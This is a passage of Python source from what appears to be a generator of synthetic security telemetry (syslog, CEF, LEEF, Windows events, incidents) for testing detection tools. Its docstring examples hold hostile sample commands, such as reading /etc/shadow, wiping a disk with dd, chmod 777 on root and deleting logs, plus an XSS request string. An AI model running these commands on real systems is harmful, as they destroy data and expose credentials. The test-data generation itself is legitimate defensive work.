        The function attempts to obtain the values from sources defined in configuration files. If the function fails to
        retrieve values from any configured source, it generates fake values using Faker library.

        Args:
        - count: The number of observables to generate.
        - observable_type: The type of observable to generate (e.g., IP, URL, SHA256, CVE, Terms).
        - known: The known status of the observable (e.g., BAD, GOOD).

        Returns:
        - A list of generated observables.

        Raises:
        - Exception: If the function fails to retrieve data from any configured source with an HTTP status code other
            than 200.
        """
        faker = cls._create_faker()
        gen_observables = []
        if observable_type == ObservableType.IP and known == ObservableKnown.BAD:
            for source in BAD_IP_SOURCES:
                try:
                    gen_observables = cls._get_observables_from_source(source)[:count]
                    break
                except Exception as e:
                    warnings.warn(f"Failed to connect to source: {source['url']} with error: {e}.")
                    continue
            if not gen_observables:
                warnings.warn(f"No source of a bad ip , generating a random IP.")
                for i in range(count):
                    gen_observables.append(faker.ipv4())
        if observable_type == ObservableType.IP and known == ObservableKnown.GOOD:
            for source in GOOD_IP_SOURCES:
                try:
                    gen_observables = cls._get_observables_from_source(source)[:count]
                    break
                except Exception as e:
                    warnings.warn(f"Failed to connect to source: {source['url']} with error: {e}.")
                    continue
            if not gen_observables:
                warnings.warn(f"No source of a good ip , generating a random IP.")
                for i in range(count):
                    gen_observables.append(faker.ipv4())
        if observable_type == ObservableType.URL and known == ObservableKnown.BAD:
            for source in BAD_URL_SOURCES:
                try:
                    gen_observables = cls._get_observables_from_source(source)[:count]
                    break
                except Exception as e:
                    warnings.warn(f"Failed to connect to source: {source['url']} with error: {e}.")
                    continue
            if not gen_observables:
                warnings.warn(f"No source of a bad url , generating a random url.")
                for i in range(count):
                    gen_observables.append(faker.url())
        if observable_type == ObservableType.URL and known == ObservableKnown.GOOD:
            for source in GOOD_URL_SOURCES:
                try:
                    gen_observables = cls._get_observables_from_source(source)[:count]
                    break
                except Exception as e:
                    warnings.warn(f"Failed to connect to source: {source['url']} with error: {e}.")
                    continue
            if not gen_observables:
                warnings.warn(f"No source of a good url , generating a random url.")
                for i in range(count):
                    gen_observables.append(faker.url())
        if observable_type == ObservableType.SHA256 and known == ObservableKnown.BAD:
            for source in BAD_SHA256_SOURCES:
                try:
                    gen_observables = cls._get_observables_from_source(source)[:count]
                    break
                except Exception as e:
                    warnings.warn(f"Failed to connect to source: {source['url']} with error: {e}.")
                    continue
            if not gen_observables:
                warnings.warn(f"No source of a bad hash , generating a random hash.")
                for i in range(count):
                    random_string = faker.text(max_nb_chars=50)
                    gen_observables.append(hashlib.sha256(random_string.encode()).hexdigest())
        if observable_type == ObservableType.SHA256 and known == ObservableKnown.GOOD:
            for source in GOOD_SHA256_SOURCES:
                try:
                    gen_observables = cls._get_observables_from_source(source)[:count]
                    break
                except Exception as e:
                    warnings.warn(f"Failed to connect to source: {source['url']} with error: {e}.")
                    continue
            if not gen_observables:
                warnings.warn(f"No source of a good hash , generating a random hash.")
                for i in range(count):
                    random_string = faker.text(max_nb_chars=50)
                    gen_observables.append(hashlib.sha256(random_string.encode()).hexdigest())
        if observable_type == ObservableType.CVE:
            for source in CVE_SOURCES:
                try:
                    gen_observables = cls._get_observables_from_source(source)[:count]
                    break
                except Exception as e:
                    warnings.warn(f"Failed to connect to source: {source['url']} with error: {e}.")
                    continue
            if not gen_observables:
                warnings.warn(f"No source of a cve , generating a random cve.")
                for i in range(count):
                    fake_cve = "CVE-" + faker.numerify(text="####-####")
                    gen_observables.append(fake_cve)
        if observable_type == ObservableType.TERMS:
            for source in TERMS_SOURCES:
                try:
                    gen_observables = cls._get_observables_from_source(source)[:count]
                    break
                except Exception as e:
                    warnings.warn(f"Failed to connect to source: {source['url']} with error: {e}.")
                    continue
            if not gen_observables:
                warnings.warn(f"No source of terms , generating random terms.")
                for i in range(count):
                    gen_observables.append(faker.sentence(nb_words=5))
        return gen_observables


class Events:

    @staticmethod
    def _create_faker():
        """
        Returns:
            Faker instance.
        """
        return Faker()

    @staticmethod
    def _create_generator():
        """
        Returns:
            Faker instance.
        """
        return Observables()

    @classmethod
    def set_field(cls, field, observables: Optional[Observables] = None):
        """
        Returns:
            Field value.
        """
        field_value = None
        faker = cls._create_faker()
        if field == "pid":
            field_value = faker.random_int(min=1000, max=65535)
        if field == "src_host":
            field_value = random.choice(observables.src_host) if observables and observables.src_host \
                else faker.hostname()
        if field == "user":
            field_value = random.choice(observables.user) if observables and observables.user \
                else faker.user_name()
        if field == "unix_process":
            field_value = random.choice(observables.unix_process) if observables and observables.unix_process \
                else "sudo"
        if field == "unix_child_process":
            field_value = random.choice(observables.unix_child_process) if observables and \
                                                                           observables.unix_child_process else "sudo"
        if field == "unix_cmd":
            field_value = random.choice(observables.unix_cmd) if observables and observables.unix_cmd \
                else random.choice(UNIX_CMD)
        if field == "severity":
            field_value = random.choice(observables.severity) if observables and observables.severity \
                else random.choice(SEVERITIES)
        if field == "local_ip":
            field_value = random.choice(observables.local_ip) if observables and observables.local_ip \
                    else faker.ipv4()
        if field == "local_port":
            field_value = faker.random_int(min=1024, max=65535)
        if field == "remote_ip":
            field_value = random.choice(observables.remote_ip) if observables and observables.remote_ip \
                    else Observables.generator(observable_type=ObservableType.IP, known=ObservableKnown.BAD, count=1)[0]
        if field == "remote_port":
            field_value = random.choice(observables.remote_port) if observables and observables.remote_port \
                    else faker.random_int(min=1024, max=65535)
        if field == "dst_url":
            field_value = random.choice(observables.url) if observables and observables.url \
                    else Observables.generator(observable_type=ObservableType.URL, known=ObservableKnown.BAD, count=1)
        if field == "inbound_bytes":
            field_value = random.choice(observables.inbound_bytes) if observables and observables.inbound_bytes \
                    else faker.random_int(min=10, max=1073741824)
        if field == "outbound_bytes":
            field_value = random.choice(observables.outbound_bytes) if observables and observables.outbound_bytes \
                    else faker.random_int(min=10, max=1073741824)
        if field == "protocol":
            field_value = random.choice(observables.protocol) if observables and observables.protocol \
                    else random.choice(PROTOCOLS)
        if field == "rule_id":
            field_value = random.choice(observables.event_id) if observables and observables.event_id \
                    else faker.random_int(min=1, max=200)
        if field == "action":
            field_value = random.choice(observables.action) if observables and observables.action \
                    else random.choice(ACTIONS)
        if field == "src_domain":
            field_value = random.choice(observables.src_domain) if observables and observables.src_domain \
                    else faker.domain_name()
        if field == "sender_email":
            field_value = random.choice(observables.sender_email) if observables and observables.sender_email \
                    else faker.email()
        if field == "recipient_email":
            field_value = random.choice(observables.recipient_email) if observables and observables.recipient_email \
                    else faker.email()
        if field == "email_subject":
            field_value = random.choice(observables.email_subject) if observables and observables.email_subject \
                    else faker.sentence(nb_words=6)
        if field == "email_body":
            field_value = random.choice(observables.email_body) if observables and observables.email_body else \
                    faker.sentence(nb_words=50)
        if field == "attachment_hash":
            field_value = random.choice(observables.file_hash) if observables and observables.file_hash \
                    else Observables.generator(observable_type=ObservableType.SHA256, known=ObservableKnown.BAD,
                                               count=1)
        if field == "spam_score":
            field_value = faker.random_int(min=1, max=5)
        if field == "method":
            field_value = random.choice(observables.technique).get('mechanism') if observables and \
                    observables.technique else random.choice(TECHNIQUES).get('mechanism')
        if field == "url":
            field_value = random.choice(observables.technique).get('indicator') if observables and \
                    observables.technique else random.choice(TECHNIQUES).get('indicator')
        if field == "user_agent":
            field_value = faker.user_agent()
        if field == "referer":
            field_value = random.choice(observables.url) if observables and observables.url \
                    else Observables.generator(observable_type=ObservableType.URL, known=ObservableKnown.BAD, count=1)
        if field == "response_code":
            field_value = random.choice(observables.error_code) if observables and observables.error_code \
                    else random.choice(ERROR_CODE)
        if field == "response_size":
            field_value = faker.random_int(min=100, max=10000)
        if field == "attack_type":
            field_value = random.choice(observables.technique).get('technique') if observables and \
                    observables.technique else random.choice(TECHNIQUES).get('technique')
        if field == "cookies":
            field_value = f"{faker.word()}={faker.uuid4()}"
        if field == "guid":
            field_value = faker.uuid4()
        if field == "transmitted_services":
            field_value = faker.sentence(nb_words=5)
        if field == "process_id":
            field_value = faker.random_int()
        if field == "new_process_id":
            field_value = faker.random_int()
        if field == "thread_id":
            field_value = faker.random_int()
        if field == "target_pid":
            field_value = faker.random_int()
        if field == "subject_login_id":
            field_value = faker.random_int()
        if field == "win_user_id":
            field_value = "S-1-" + str(faker.random_int())
        if field == "destination_login_id":
            field_value = faker.random_int()
        if field == "privilege_list":
            field_value = faker.sentence(nb_words=5)
        if field == "event_record_id":
            field_value = random.choice(observables.event_id) if observables and observables.event_id \
                else faker.random.randint(1, 999)
        if field == "win_process":
            field_value = random.choice(observables.win_process) if observables and observables.win_process \
                else random.choice(WIN_PROCESSES)
        if field == "win_cmd":
            field_value = random.choice(observables.win_cmd) if observables and observables.win_cmd \
                else random.choice(WINDOWS_CMD)
        if field == "win_child_process":
            field_value = random.choice(observables.win_child_process) if \
                observables and observables.win_child_process else random.choice(WIN_PROCESSES)
        if field == "source_network_address":
            field_value = random.choice(observables.local_ip) if observables and observables.local_ip \
                else faker.ipv4_private()
        if field == "file_name":
            field_value = random.choice(observables.file_name) if observables and observables.file_name \
                else faker.file_name()
        if field == "cve_id":
            field_value = random.choice(observables.cve) if observables and observables.cve \
                    else Observables.generator(observable_type=ObservableType.CVE, count=1)
        if field == "file_hash":
            field_value = random.choice(observables.file_hash) if observables and observables.file_hash \
                    else Observables.generator(observable_type=ObservableType.SHA256, known=ObservableKnown.BAD,
                                               count=1)
        if field == "incident_types":
            field_value = random.choice(observables.incident_types) if observables and observables.incident_types \
                else INCIDENTS_TYPES
        if field == "analysts":
            field_value = random.choice(observables.analysts) if observables and observables.analysts \
                else [faker.unique.first_name() for _ in range(10)]
        if field == "duration":
            field_value = random.randint(1, 5)
        if field == "log_id":
            field_value = faker.uuid4()
        if field == "alert_name":
            field_value = random.choice(observables.alert_name) if observables and observables.alert_name \
                else faker.sentence(nb_words=4)
        return field_value

    @classmethod
    def syslog(cls, count: int, datetime_iso: Optional[datetime] = None, observables: Optional[Observables] = None,
               required_fields: Optional[str] = None) -> List[str]:
        """
        Generate fake syslog messages.

        Args:
            count: The number of syslog messages to generate.
            datetime_iso: Optional. The starting datetime_iso for the syslog messages. If not provided, a random time during
            the past hour from now will be used.
            observables: Optional. An observables object. If not provided, random objservable will be generated
            and used.
            required_fields: Optional. A list of fields that are required to present in the generated data, whether from
            observables or randomely.
        Returns:
            A list of syslog messages.

        Examples:
            >>> Events.syslog(5)
            ['Jan 01 05:32:48 myhostname sudo[1023]: username : COMMAND ; cat /etc/shadow',
             'Jan 01 05:17:59 myhostname sudo[2019]: username : COMMAND ; find / -name \'*.log\' -exec rm -f {} \\;',
             'Jan 01 05:46:16 myhostname sudo[3132]: username : COMMAND ; dd if=/dev/zero of=/dev/sda',
             'Jan 01 05:08:08 myhostname sudo[4111]: username : COMMAND ; chmod -R 777 /',
             'Jan 01 05:59:41 myhostname sudo[5195]: username : COMMAND ; chown -R nobody:nogroup /']

        """
        syslog_messages = []
        faker = cls._create_faker()
        if datetime_iso is None:
            datetime_iso = datetime.now() - timedelta(hours=1)
            datetime_iso += timedelta(seconds=faker.random_int(min=0, max=3599))
        if not required_fields:
            required_fields = "pid,host,user,unix_process,unix_cmd"
        for i in range(count):
            datetime_iso += timedelta(seconds=1)
            syslog_message = f"{datetime_iso.strftime('%Y-%m-%d %H:%M:%S')}"
            for field in required_fields.split(","):
                syslog_message += f" {cls.set_field(field, observables)}"
            if observables:
                for observable, observable_value in vars(observables).items():
                    if observable_value and observable not in required_fields.split(","):
                        syslog_message += f" {random.choice(observable_value)}"
            syslog_messages.append(syslog_message)
        return syslog_messages

    @classmethod
    def cef(cls, count: int, vendor: Optional[str] = None, product: Optional[str] = None,
            version: Optional[str] = None, datetime_iso: Optional[datetime] = None,
            observables: Optional[Observables] = None, required_fields: Optional[str] = None) -> List[str]:
        """
        Generates fake CEF (Common Event Format) messages.

        Args:
            count: The number of CEF messages to generate.
            datetime_iso: Optional. The starting datetime_iso for the syslog messages. If not provided, a random time during.
            vendor: Optional. The vendor.
            product: Optional. The product value options include:
            - Firewall
            - EmailGW
            version: Optional. The version.
            observables: Optional. An observables object. If not provided, random objservable will be generated
            and used.
            required_fields: Optional. A list of fields that are required to present in the generated data, whether from
            observables or randomely.
        Returns:
            A list of fake CEF messages in string format.

        Raises:
            None.

        Example Usage:
            >>> Events.cef(3)
            ['CEF:0|Acme|Firewall|1.0.0|ddab6607-1c35-4e81-a54a-99b1c9b77e49|Firewall ALLOW UDP traffic
            from example.com:61434 to 23.216.45.109:47983|1|src=example.com spt=61434 dst=23.216.45.109
            dpt=47983 proto=UDP act=ALLOW',
             'CEF:0|Acme|Firewall|1.0.0|25b41f8f-8a63-4162-a69c-cb43f8c8e49f|Firewall DENY TCP traffic
             from example.com:11460 to 184.72.194.90:3087|8|src=example.com spt=11460 dst=184.72.194.90
             dpt=3087 proto=TCP act=DENY',
             'CEF:0|Acme|Firewall|1.0.0|a3faedaa-5109-4849-b9ec-1ad6c5f8a5ec|Firewall ALLOW TCP traffic
             from example.com:25068 to 81.171.9.216:6157|2|src=example.com spt=25068 dst=81.171.9.216
             dpt=6157 proto=TCP act=ALLOW']
        """
        cef_messages = []
        faker = cls._create_faker()
        vendor = vendor or faker.company()
        version = version or faker.numerify("1.0.#")
        if datetime_iso is None:
            datetime_iso = datetime.now() - timedelta(hours=1)
            datetime_iso += timedelta(seconds=faker.random_int(min=0, max=3599))
        if not required_fields:
            if product == "Firewall":
                required_fields = "local_ip,local_port,remote_ip,remote_port,dst_url,inbound_bytes," \
                          "outbound_bytes,protocol,rule_id,action"
            elif product == "EmailGW":
                required_fields = "local_ip,src_domain,sender_email,recipient_email,email_subject,email_body," \
                                  "attachment_hash,spam_score,action"
            else:
                required_fields = "local_ip,local_port,remote_ip,remote_port,protocol,rule_id,action"
        for i in range(count):
            datetime_iso += timedelta(seconds=1)
            cef_message = f"CEF:0|{vendor}|{product}|{version}|{cls.set_field('log_id', observables)}|{datetime_iso}" \
                          f"|{cls.set_field('severity', observables)}|"
            for field in required_fields.split(","):
                cef_message += f" {field}={cls.set_field(field, observables)}"
            if observables:
                for observable, observable_value in vars(observables).items():
                    if observable_value and observable not in required_fields.split(","):
                        cef_message += f" {observable}={random.choice(observable_value)}"
            cef_messages.append(cef_message)
        return cef_messages

    @classmethod
    def leef(cls, count, datetime_iso: Optional[datetime] = None, vendor: Optional[str] = None,
             product: Optional[str] = None, version: Optional[str] = None,
             observables: Optional[Observables] = None, required_fields: Optional[str] = None) -> List[str]:
        """
        Generates fake LEEF (Log Event Extended Format) messages.

        Parameters:
            count (int): The number of LEEF messages to generate.
            datetime_iso: Optional. The starting datetime_iso for the syslog messages. If not provided, a random time during.
            vendor: Optional. The vendor.
            product: Optional. The product.
            version: Optional. The version.
            observables: An observables object. If not provided, random objservable will be generated and used.
            required_fields: Optional. A list of fields that are required to present in the generated data, whether from
            observables or randomely.

        Returns:
            A list of generated LEEF messages.

        Example:
            To generate 10 fake LEEF messages:
            ```
            >>> messages = Events.leef(count=2)
            >>> print(messages)
            ['LEEF:1.0|Leef|Payment Portal|1.0|192.168.0.1|mycomputer|08:00:27:da:2e:2e|08:00:27:da:2e:2f|src=10.0.0.1
             dst=mycomputer spt=60918 dpt=443 request=https://example.com/?q=<script>alert("xss")</script>
             method=GET proto=HTTP/1.1 status=200 request_size=5119 response_size=6472
             user_agent=Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko)
             Chrome/93.0.4577.63 Safari/537.36',
             'LEEF:1.0|Leef|Payment Portal|1.0|192.168.0.1|mycomputer|08:00:27:da:2e:2e|08:00:27:da:2e:2f|src=10.0.0.2
              dst=mycomputer spt=57251 dpt=443 request=https://example.com/admin.php?sessionid=12345 method=POST
               proto=HTTP/1.1 status=404 request_size=1216 response_size=9729 user_agent=Mozilla/5.0
               (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3']
        """
        leef_messages = []
        faker = cls._create_faker()
        vendor = vendor or faker.company()
        version = version or faker.numerify("1.0.#")
        if datetime_iso is None:
            datetime_iso = datetime.now() - timedelta(hours=1)
            datetime_iso += timedelta(seconds=faker.random_int(min=0, max=3599))
        if not required_fields:
            if product == "WAF":
                required_fields = "local_ip,local_port,host,method,url,protocol," \
                                  "user_agent,referer,response_code,response_size,rule_id,action,attack_type,cookies"
            else:
                required_fields = "local_ip,local_port,host,url,protocol,response_code,action"
        for i in range(count):
            datetime_iso += timedelta(seconds=1)
            leef_message = f"LEEF:1.0|{vendor}|{product}|{version}|deviceEventDate={datetime_iso}|" \
                           f"severity={cls.set_field('severity', observables)}"
            for field in required_fields.split(","):
                leef_message += f" | {field}={cls.set_field(field, observables)}"
            if observables:
                for observable, observable_value in vars(observables).items():
                    if observable_value and observable not in required_fields.split(","):
                        leef_message += f" | {observable}={random.choice(observable_value)}"
            leef_messages.append(leef_message)
        return leef_messages

    @classmethod
    def winevent(cls, count, datetime_iso: Optional[datetime] = None, observables: Optional[Observables] = None) -> \
            List[str]:
        """
        Generates fake Windows Event Log messages.

        Args:
            count (int): The number of fake messages to generate.
            datetime_iso: Optional. The starting datetime_iso for the syslog messages. If not provided, a random time during
            observables: An observables object. If not provided, random objservable will be generated and used.

        Returns:
            list: A list of fake Windows Event Log messages.

        Examples:
            >>> Events.winevent(1)
            ['<Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event">...</Event>', ...]
        """
        winevent_messages = []
        faker = cls._create_faker()
        if datetime_iso is None:
            datetime_iso = datetime.now() - timedelta(hours=1)
            datetime_iso += timedelta(seconds=faker.random_int(min=0, max=3599))
        for i in range(count):
            datetime_iso += timedelta(seconds=1)
            guid = faker.uuid4()
            local_port = faker.random_int(min=1024, max=65535)
            transmitted_services = faker.sentence(nb_words=5)
            system_time = datetime_iso
            process_id = faker.random_int()
            new_process_id = faker.random_int()
            thread_id = faker.random_int()
            target_pid = faker.random_int()
            domain_name = faker.domain_name()
            subject_login_id = faker.random_int()
            user_id = "S-1-" + str(faker.random_int())
            destination_login_id = faker.random_int()
            privilege_list = faker.sentence(nb_words=5)
            event_record_id = random.choice(observables.event_id) if observables and observables.event_id \
                else faker.random.randint(1, 999)
            process_name = random.choice(observables.win_process) if observables and observables.win_process \
                else random.choice(WIN_PROCESSES)
            host = random.choice(observables.src_host) if observables and observables.src_host \
                else faker.hostname()
            user_name = random.choice(observables.user) if observables and observables.user \
                else faker.user_name()
            cmd = random.choice(observables.win_cmd) if observables and observables.win_cmd \
                else random.choice(WINDOWS_CMD)
            source_network_address = random.choice(observables.local_ip) if observables and observables.local_ip \
                else faker.ipv4_private()
            file_name = random.choice(observables.file_name) if observables and observables.file_name \
                else faker.file_name()
            unformatted_event = random.choice(WIN_EVENTS)
            win_event = unformatted_event.format(guid=guid, system_time=system_time, event_record_id=event_record_id,
                                                 process_id=process_id, process_name=process_name,
                                                 new_process_id=new_process_id, thread_id=thread_id,
                                                 target_pid=target_pid, host=host, user_id=user_id, user_name=user_name,
                                                 domain_name=domain_name, subject_login_id=subject_login_id,
                                                 privilege_list=privilege_list, cmd=cmd,
                                                 destination_login_id=destination_login_id,
                                                 source_network_address=source_network_address, source_port=local_port,
                                                 transmitted_services=transmitted_services, file_name=file_name)
            winevent_messages.append(win_event)
        return winevent_messages

    @classmethod
    def json(cls, count, datetime_iso: Optional[datetime] = None, vendor: Optional[str] = None,
             product: Optional[str] = None, version: Optional[str] = None, observables: Optional[Observables] = None,
             required_fields: Optional[str] = None) -> List[dict]:
        """
        Generate fake JSON messages representing discovered vulnerabilities.

        Args:
            count (int): The number of JSON messages to generate.
            datetime_iso: Optional. The starting datetime_iso for the syslog messages. If not provided, a random time during.
            vendor: Optional. The vendor.
            product: Optional. The product value options include:
            - VulnScanner
            version: Optional. The version.
            observables: An observables object. If not provided, random objservable will be generated and used.
            required_fields: Optional. A list of fields that are required to present in the generated data, whether from
            observables or randomely.
        Returns:
            List[Dict[str, Union[str, int]]]: A list of dictionaries representing the generated JSON messages.

        Example:
            >>> fake_messages = json(5)
            >>> len(fake_messages)
            5
            >>> isinstance(fake_messages[0], dict)
            True

        """
        json_messages = []
        faker = cls._create_faker()
        vendor = vendor or faker.company()
        version = version or faker.numerify("1.0.#")
        if datetime_iso is None:
            datetime_iso = datetime.now() - timedelta(hours=1)
            datetime_iso += timedelta(seconds=faker.random_int(min=0, max=3599))
        if not required_fields:
            if product == "VulnScanner":
                required_fields = "cve_id,host,file_hash"
            else:
                required_fields = "user,host"
        for i in range(count):
            datetime_iso += timedelta(seconds=1)
            event = {
                'vendor': vendor,
                'product': product,
                'version': version,
                'datetime_iso': str(datetime_iso),
                'severity': cls.set_field("severity", observables)
            }
            for field in required_fields.split(","):
                event[field] = cls.set_field(field, observables)
            if observables:
                for observable, observable_value in vars(observables).items():
                    if observable_value and observable not in required_fields.split(","):
                        event[observable] = random.choice(observable_value)
            json_messages.append(event)
        return json_messages

    @classmethod
    def incidents(cls, count, fields: Optional[str] = None, datetime_iso: Optional[datetime] = None,
                  vendor: Optional[str] = None, product: Optional[str] = None, version: Optional[str] = None,
                  observables: Optional[Observables] = None, required_fields: Optional[str] = None) -> List[dict]:
        """
        Generates a list of fake incident data.

        Args:
            count (int): The number of incidents to generate.
            fields (str, optional): A comma-separated list of incident fields to include in the output. If None,
                all fields will be included. Valid options are: 'id', 'duration', 'type', 'analyst', 'severity',
                'description', 'events'.
            vendor: Optional. The vendor.
            product: Optional. The product.
            version: Optional. The version.
            datetime_iso: Optional. The starting datetime_iso for the syslog messages. If not provided, a random time during
            observables: An observables object. If not provided, random objservable will be generated and used.
            required_fields: Optional. A list of fields that are required to present in the generated data, whether from
            observables or randomely.

        Returns:
            List[Dict]: A list of incident dictionaries. Each dictionary contains the following fields:
                - 'id' (int): A unique identifier for the incident.
                - 'type' (str): The type of incident.
                - 'duration' (int): The duration of the incident in hours.
                - 'analyst' (str): The name of the analyst assigned to the incident.
                - 'severity' (str, optional): The severity of the incident. Only included if 'severity' is specified
                    in the 'fields' argument.
                - 'description' (str, optional): A brief description of the incident. Only included if 'description' is
                    specified in the 'fields' argument.
                - 'events' (List[Dict], optional): A list of event dictionaries associated with the incident.

        Example:
            >>> incidents(count=3, fields='id,type,severity')
            [
                {'id': 1, 'type': 'Lateral Movement', 'severity': 'Critical'},
                {'id': 2, 'type': 'Access Violation', 'severity': 'High'},
                {'id': 3, 'type': 'Account Compromised', 'severity': 'Low'}
            ]
        """
        incidents = []
        faker = cls._create_faker()

        incident_ids = set()

        incident_types = observables.incident_types if observables and observables.incident_types \
            else INCIDENTS_TYPES
        analysts = observables.analysts if observables and observables.analysts \
            else [faker.unique.first_name() for _ in range(10)]
        analyst_incident_map = {}
        for analyst in analysts:
            mapped_incident_type = incident_types.pop(0)
            analyst_incident_map[analyst] = mapped_incident_type
            incident_types.append(mapped_incident_type)
        for i in range(count):
            incident = {}
            duration = random.randint(1, 5)
            while True:
                incident_id = random.randint(1, count)
                if incident_id not in incident_ids:
                    incident_ids.add(incident_id)
                    break
            incident_type = random.choice(incident_types)
            analyst = random.choice(analysts)
            severity = random.choice(observables.severity) if observables and observables.severity \
                else faker.random_int(min=1, max=5)
            description = random.choice(observables.terms) if observables and observables.terms \
                else Observables.generator(observable_type=ObservableType.TERMS, known=ObservableKnown.BAD, count=1000)
            if analyst in analyst_incident_map and random.randint(1, 100) == 2:
                incident_type = analyst_incident_map[analyst]
                duration = random.randint(1, 2)
            if fields:
                field_list = fields.split(',')
                if 'id' in field_list:
                    incident['id'] = incident_id
                if 'duration' in field_list:
                    incident['duration'] = duration
                if 'type' in field_list:
                    incident['type'] = incident_type
                if 'analyst' in field_list:
                    incident['analyst'] = analyst
                if 'severity' in field_list:
                    incident['severity'] = severity
                if 'description' in field_list:
                    incident_description = faker.paragraph(nb_sentences=1, ext_word_list=description)
                    incident['description'] = incident_description
                if 'events' in field_list:
                    incident['events'] = [
                        {"event": cls.syslog(count=1, datetime_iso=datetime_iso, observables=observables,
                                             required_fields=required_fields)[0]},
                        {"event": cls.cef(count=1, datetime_iso=datetime_iso, vendor=vendor, product=product, version=version
                                          , observables=observables, required_fields=required_fields)[0]},
                        {"event": cls.leef(count=1, datetime_iso=datetime_iso, vendor=vendor, product=product,
                                           version=version, observables=observables, required_fields=required_fields)[0]},
                        {"event": cls.winevent(count=1, datetime_iso=datetime_iso, observables=observables)[0]},
                        {"event": cls.json(count=1, datetime_iso=datetime_iso, vendor=vendor, product=product,
                                           version=version, observables=observables,
                                           required_fields=required_fields)[0]}
                    ]
            else:
                incident = {
                    "id": incident_id,
                    "type": incident_type,
                    "duration": duration,
                    "analyst": analyst
                }
            incidents.append(incident)
        return incidents
